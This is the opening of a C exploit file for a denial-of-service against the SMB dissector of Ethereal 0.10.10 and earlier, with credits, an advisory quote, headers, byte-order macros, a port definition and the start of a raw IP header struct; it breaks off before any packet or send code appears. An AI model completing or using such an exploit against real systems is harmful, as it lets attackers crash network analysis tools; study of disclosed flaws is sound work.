1 /*****************************************************************/
2 /* */
3 /* Ethereal <= 0.10.10 dissect_ipc_state() DoS */
4 /* Tested on 0.9.4 and 0.10.10 */
5 /* */
6 /* Bug found by the Ethereal BuildBot */
7 /* Code ripped from vade79 */
8 /* Exploit by Nicob <nicob@nicob.net> */
9 /* */
10 /* From the Ethereal Security Advisory #19 : */
11 /* http://www.ethereal.com/appnotes/enpa-sa-00019.html */
12 /* */
13 /* "The SMB dissector could cause a segmentation fault and throw */
14 /* assertions. Versions affected: 0.9.0 to 0.10.10" */
15 /* */
16 /*****************************************************************/
17
18 #include <stdio.h>
19 #include <stdlib.h>
20 #include <unistd.h>
21 #include <string.h>
22 #include <signal.h>
23 #include <time.h>
24 #include <sys/socket.h>
25 #include <sys/types.h>
26 #include <netinet/in.h>
27 #include <netdb.h>
28 #ifdef _USE_ARPA
29 #include <arpa/inet.h>
30 #endif
31
32 /* doesn't seem to be standardized, so... */
/* Best-effort host byte-order detection. BYTE_ORDER / BIG_ENDIAN are
 * taken from the platform headers when present, otherwise aliased from
 * the glibc-style double-underscore spellings. Nothing on this page
 * includes <endian.h> directly, so these macros are presumably exposed
 * transitively by the network headers above -- unverified here. If
 * neither pair is available, _USE_BIG_ENDIAN is simply never defined
 * and every "#ifdef _USE_BIG_ENDIAN" below takes its non-big-endian
 * branch, which is the correct default on x86-class hosts only. */
33 #if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
34 #define BYTE_ORDER __BYTE_ORDER
35 #endif
36 #if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
37 #define BIG_ENDIAN __BIG_ENDIAN
38 #endif
39 #if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
40 #if BYTE_ORDER == BIG_ENDIAN
/* NOTE(review): "_USE_BIG_ENDIAN" (like "_USE_ARPA" above) begins with
 * an underscore followed by an uppercase letter, a form reserved for the
 * implementation (C11 7.1.3). Renaming would have to be applied at every
 * use site (the struct below tests it), so it is left as-is here. */
41 #define _USE_BIG_ENDIAN
42 #endif
43 #endif
44
45 /* will never need to be changed. */
/* 138 is the IANA "netbios-dgm" (NetBIOS datagram service) port, not
 * the NetBIOS session port (139) or direct-hosted SMB (445), so the
 * macro name is slightly misleading. Whether the code below sends UDP
 * or TCP to this port is not visible on this page. */
46 #define SMB_PORT 138
47
48 /* avoid platform-specific header madness. */
49 /* (just plucked out of header files) */
50 struct iph{
51 #ifdef _USE_BIG_ENDIAN
52 unsigned char version:4,ihl:4;